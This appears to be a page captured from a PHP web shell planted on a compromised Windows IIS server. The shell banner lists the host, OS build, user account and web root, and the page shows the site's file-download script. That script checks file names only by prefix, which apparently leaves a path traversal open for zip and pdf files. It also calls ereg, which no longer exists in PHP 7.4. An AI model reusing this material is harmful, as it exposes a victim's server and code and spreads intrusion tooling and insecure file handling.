HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
$ pwd: D:/HostingSpaces/SBogers10/promic.komma.pro/wwwroot/
Upload Files
File: D:/HostingSpaces/SBogers10/promic.komma.pro/wwwroot/downloadWithoutLogin.php
<?php


include("functions.php");

function startsWith($haystack, $needle)
{
    $length = strlen($needle);
    return (substr($haystack, 0, $length) === $needle);
}

if (isset($_GET["file"]) && isset($_GET["ext"])){
    $bestandsnaam = $_GET["file"];
    $ext = $_GET["ext"];
    $product = $_GET["product"];

    if(!in_array($product, ['flex-tower', 'counters-flex', 'flags-alu-wind', 'flags-alu-drop', 'flags-alu-square',]) ){
        echo 'Products error';
        exit;
    }
    if(
        !in_array($bestandsnaam, ['flex-tower_photos_high', 'flex-tower_photos', 'counters-flex_photos_high', 'counters-flex_photos', 'flags-alu-wind_photos_high', 'flags-alu-square_photos_high', 'flags-alu-drop_photos_high'])
        && !startsWith($bestandsnaam, 'flags-alu-wind_specs_')
        && !startsWith($bestandsnaam, 'flags-alu-square_specs_')
        && !startsWith($bestandsnaam, 'flags-alu-drop_specs_')
    ){
        echo 'File name error';
        exit;
    }

    if(!empty($product)){
        $filename = "product_data/downloads/".$product."/".$bestandsnaam.".".$ext;
        $database_bestand = $product."/".$bestandsnaam.".".$ext;
    }

    if(in_array($ext, ["zip", 'pdf'])){ //alleen extensie zip of pdf.
        if ( ! file_exists( $filename ) ){
            if($taal_input == "nl"){ echo("Dit bestand bestaat niet."); }else{ echo("This file doesn't exists."); }

            exit;
        }
        if(ini_get('zlib.output_compression')){
          ini_set('zlib.output_compression', 'Off');
        }
        switch($ext){
          case "pdf": $ctype="application/pdf"; break;
          case "zip": $ctype="application/octet-stream"; break;
          case "exe": $ctype="application/octet-stream"; break;
          case "doc": $ctype="application/msword"; break;
          case "xls": $ctype="application/vnd.ms-excel"; break;
          case "ppt": $ctype="application/vnd.ms-powerpoint"; break;
          case "gif": $ctype="image/gif"; break;
          case "png": $ctype="image/png"; break;
          case "jpeg": $ctype="image/jpg"; break;
          case "jpg": $ctype="image/jpg"; break;
          default: $ctype="application/force-download";
        }
        header("Pragma: public"); // required
        header("Expires: 0");
        header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
        header("Cache-Control: private",false); // required for certain browsers

        if(!ereg("MSIE 7.0",$_SERVER['HTTP_USER_AGENT'])){
            //removing the Content Type for IE 7 seems to work
            header('Content-Type: '.$ctype);
        }
        if(!ereg("MSIE 8.0",$_SERVER['HTTP_USER_AGENT'])){
            //removing the Content Type for IE 8 seems to work
            header('Content-Type: '.$ctype);
        }
        header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
        header("Content-Transfer-Encoding: binary");
        header("Content-Length: ".filesize($filename));
        readfile("$filename");

        exit();
    }
}

?>
@ Telegram